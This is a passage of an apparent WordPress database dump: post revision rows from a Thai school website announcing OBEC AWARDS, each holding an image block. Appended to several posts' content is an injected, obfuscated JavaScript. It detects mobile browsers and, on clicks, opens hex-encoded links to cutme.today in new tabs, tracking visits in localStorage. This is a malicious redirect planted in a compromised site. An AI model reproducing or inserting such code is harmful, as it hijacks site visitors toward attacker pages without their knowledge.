u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','รางวัลทรงคุณค่า OBEC AWARDS','','inherit','closed','closed','','444-revision-v1','','','2024-09-25 14:21:27','2024-09-25 07:21:27','',444,'http://watprato.ssk.in.th/?p=446',0,'revision','',0),
(448,2,'2024-09-25 14:24:56','2024-09-25 07:24:56','<!-- wp:generateblocks/image {\"uniqueId\":\"6159cfd9\",\"mediaId\":445,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-6159cfd9\"><img class=\"gb-image gb-image-6159cfd9\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/S__95092749_0.jpg\" alt=\"\" title=\"S__95092749_0\"/></figure>\n<!-- /wp:generateblocks/image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','รางวัลทรงคุณค่า OBEC AWARDS การประกวดรางวัลทรงคุณค่า สพฐ.(OBEC AWADS) ระดับภาคตะวันออกเฉียงเหนือ ครั้งที่ 12 ประจำปีการศึกษา 2565-2566.รางวัลทรงคุณค่า OBEC AWARDS','','inherit','closed','closed','','444-revision-v1','','','2024-09-25 14:24:56','2024-09-25 07:24:56','',444,'http://watprato.ssk.in.th/?p=448',0,'revision','',0),
(449,2,'2024-09-25 14:28:45','2024-09-25 07:28:45','<!-- wp:generateblocks/image {\"uniqueId\":\"b9559ec7\",\"mediaId\":450,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-b9559ec7\"><img class=\"gb-image gb-image-b9559ec7\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/S__95092747_0.jpg\" alt=\"\" title=\"S__95092747_0\"/></figure>\n<!-- /wp:generateblocks/image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new 